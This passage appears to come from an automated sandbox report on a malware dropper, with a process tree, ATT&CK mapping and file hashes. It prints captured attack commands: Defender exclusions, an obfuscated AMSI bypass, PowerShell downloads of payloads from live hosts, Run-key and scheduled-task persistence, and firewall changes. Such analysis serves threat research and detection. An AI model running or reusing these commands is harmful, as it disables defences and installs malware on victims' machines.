PID 2508 wrote to memory of 1364 | 2508 | wscript.exe | 110
PID 2508 wrote to memory of 1364 | 2508 | wscript.exe | 110
PID 2724 wrote to memory of 884 | 2724 | http185.215.113.66pei.exe.exe | 112
PID 2724 wrote to memory of 884 | 2724 | http185.215.113.66pei.exe.exe | 112
PID 2724 wrote to memory of 884 | 2724 | http185.215.113.66pei.exe.exe | 112
PID 1364 wrote to memory of 2692 | 1364 | cmd.exe | 116
PID 1364 wrote to memory of 2692 | 1364 | cmd.exe | 116
PID 1364 wrote to memory of 2692 | 1364 | cmd.exe | 116
PID 928 wrote to memory of 780 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 119
PID 928 wrote to memory of 780 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 119
PID 928 wrote to memory of 780 | 928 | 3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe | 119
PID 1968 wrote to memory of 3824 | 1968 | http185.215.113.66newtpp.exe.exe | 122
PID 1968 wrote to memory of 3824 | 1968 | http185.215.113.66newtpp.exe.exe | 122
PID 1968 wrote to memory of 3824 | 1968 | http185.215.113.66newtpp.exe.exe | 122
PID 1364 wrote to memory of 4776 | 1364 | cmd.exe | 187
PID 1364 wrote to memory of 4776 | 1364 | cmd.exe | 187
PID 1364 wrote to memory of 4776 | 1364 | cmd.exe | 187
PID 2548 wrote to memory of 4652 | 2548 | powershell.exe | 131
PID 2548 wrote to memory of 4652 | 2548 | powershell.exe | 131
PID 2548 wrote to memory of 4652 | 2548 | powershell.exe | 131
PID 3076 wrote to memory of 1984 | 3076 | httpguatemalacayerealestate.combatushkainte.exe.exe | 134
PID 3076 wrote to memory of 1984 | 3076 | httpguatemalacayerealestate.combatushkainte.exe.exe | 134
PID 3076 wrote to memory of 1984 | 3076 | httpguatemalacayerealestate.combatushkainte.exe.exe | 134
PID 1984 wrote to memory of 4336 | 1984 | cmd.exe | 141
PID 1984 wrote to memory of 4336 | 1984 | cmd.exe | 141
PID 1984 wrote to memory of 4336 | 1984 | cmd.exe | 141
PID 1968 wrote to memory of 3928 | 1968 | http185.215.113.66newtpp.exe.exe | 139
PID 1968 wrote to memory of 3928 | 1968 | http185.215.113.66newtpp.exe.exe | 139
PID 1968 wrote to memory of 3928 | 1968 | http185.215.113.66newtpp.exe.exe | 139
PID 2548 wrote to memory of 1576 | 2548 | powershell.exe | 140
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
[1] C:\Windows\system32\sihost.exe
    cmd: sihost.exe
    PID: 2524
    [2] C:\Windows\SysWOW64\dialer.exe
        cmd: "C:\Windows\system32\dialer.exe"
        - Suspicious behavior: EnumeratesProcesses
        PID: 5888
[1] C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 928
    [2] C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        PID: 2724
        [3] C:\Users\Admin\AppData\Local\Temp\3013831348.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\3013831348.exe
            - Executes dropped EXE
            PID: 884
    [2] C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"
        - Windows security bypass
        - Executes dropped EXE
        - Windows security modification
        - Adds Run key to start application
        - Drops file in Windows directory
        - Suspicious use of WriteProcessMemory
        PID: 1968
        [3] C:\Users\Admin\AppData\Local\Temp\1002628022.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\1002628022.exe
            - Windows security bypass
            - Executes dropped EXE
            - Windows security modification
            - Adds Run key to start application
            - Drops file in Windows directory
            - Suspicious behavior: SetClipboardViewer
            PID: 3824
            [4] C:\Users\Admin\AppData\Local\Temp\275354733.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\275354733.exe
                - Executes dropped EXE
                PID: 5488
            [4] C:\Users\Admin\AppData\Local\Temp\667029277.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\667029277.exe
                - Executes dropped EXE
                PID: 5244
            [4] C:\Users\Admin\AppData\Local\Temp\3216420798.exe
                cmd: C:\Users\Admin\AppData\Local\Temp\3216420798.exe
                - Executes dropped EXE
                PID: 3840
        [3] C:\Users\Admin\AppData\Local\Temp\2770021532.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\2770021532.exe
            - Windows security bypass
            - Executes dropped EXE
            - Windows security modification
            - Adds Run key to start application
            - Drops file in Windows directory
            PID: 3928
        [3] C:\Users\Admin\AppData\Local\Temp\1793913919.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\1793913919.exe
            - Executes dropped EXE
            PID: 5180
        [3] C:\Users\Admin\AppData\Local\Temp\2321415439.exe
            cmd: C:\Users\Admin\AppData\Local\Temp\2321415439.exe
            - Executes dropped EXE
            PID: 4584
    [2] C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
        cmd: "C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 3156
        [3] C:\Windows\SysWOW64\cmd.exe
            cmd: "C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
            - Suspicious use of WriteProcessMemory
            PID: 1536
            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                cmd: powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
                - Blocklisted process makes network request
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
                PID: 2548
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
                    - Suspicious behavior: EnumeratesProcesses
                    - Suspicious use of AdjustPrivilegeToken
                    PID: 4652
                [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\system32\timeout.exe" /t 15⤵
- Delays execution with timeout.exe
PID:5560
-
-
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"5⤵
- Executes dropped EXE
PID:4320
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | Out-File -FilePath 'C:\Users\Admin\UndLdl.ps1' -Encoding UTF8"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\UndLdl.ps1"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5572 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 6127⤵
- Program crash
PID:5484
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7403⤵
- Program crash
PID:3888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7483⤵
- Program crash
PID:1456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 8243⤵
- Program crash
PID:2124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 7843⤵
- Program crash
PID:2636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 9603⤵
- Program crash
PID:2256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 9923⤵
- Program crash
PID:3632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 13323⤵
- Program crash
PID:4448
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe" & exit3⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 13643⤵
- Program crash
PID:3928
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe"C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe"2⤵
- Executes dropped EXE
PID:3728
-
-
C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe"C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:780
-
-
C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;3⤵PID:1368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2788
-
-
C:\Windows\SysWOW64\timeout.exe"C:\Windows\system32\timeout.exe" /t 15⤵
- Delays execution with timeout.exe
PID:3348
-
-
C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"5⤵
- Executes dropped EXE
PID:3088
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catfxYvCG6c.exe.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6088
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:6112
-
-
C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe"C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5888
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$embr-Ember" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$embr-Ember\$embr-client.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:5688 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:4776
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Invoke-WebRequest https://files.offshore.cat/DSKeOWN1.exe -OutFile C:\Windows\Logs\Ember-Rootkit\embr-rootkit.exe4⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpfiles.offshore.catDSKeOWN1.exe.exe"2⤵
- Executes dropped EXE
PID:5580
-
-
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5868 -
C:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exeC:\Users\Admin\AppData\Local\Temp\httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe3⤵
- Modifies security service
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
PID:5036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause4⤵PID:5728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191234.exe.exe"2⤵
- Executes dropped EXE
PID:5824
-
-
C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup8.exe.exe"2⤵
- Executes dropped EXE
PID:5876
-
-
C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http185.172.128.59ISetup2.exe.exe"2⤵
- Executes dropped EXE
PID:5284
-
-
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD5d2a75Tester.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:5680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6056
-
-
-
C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsfile-drop.ccD24e534svchost.exe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:6124 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"3⤵
- Creates scheduled task(s)
PID:5832
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /delete /f /tn "svchost"3⤵PID:3724
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp47FC.tmp.bat""3⤵PID:4572
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:5972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.2191111.exe.exe"2⤵
- Executes dropped EXE
PID:4956
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.219test2.exe.exe"2⤵
- Executes dropped EXE
PID:5964
-
-
C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe"C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:2004 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe" "httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:5456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\http88.218.61.219555.exe.exe"C:\Users\Admin\AppData\Local\Temp\http88.218.61.219555.exe.exe"2⤵
- Executes dropped EXE
PID:4960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3076 -ip 30761⤵PID:4752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3076 -ip 30761⤵PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3076 -ip 30761⤵PID:5076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 30761⤵PID:408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3076 -ip 30761⤵PID:3788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3076 -ip 30761⤵PID:2500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3076 -ip 30761⤵PID:216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3076 -ip 30761⤵PID:1564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5572 -ip 55721⤵PID:5880
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5544 --field-trial-handle=2268,i,8796662530135712346,11409037572378858775,262144 --variations-seed-version /prefetch:81⤵PID:5344
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5712
-
C:\Users\Public\svchost.exeC:\Users\Public\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5580
-
C:\Windows\svchost.exeC:\Windows\svchost.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3076 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp386B.tmp.bat""2⤵PID:5648
-
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:6024
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (3)
  - Disable or Modify System Firewall (1)
  - Disable or Modify Tools (2)
- Modify Registry (4)
- Pre-OS Boot (1)
  - Bootkit (1)
- Virtualization/Sandbox Evasion (2)
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD56195a91754effb4df74dbc72cdf4f7a6
SHA1aba262f5726c6d77659fe0d3195e36a85046b427
SHA2563254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
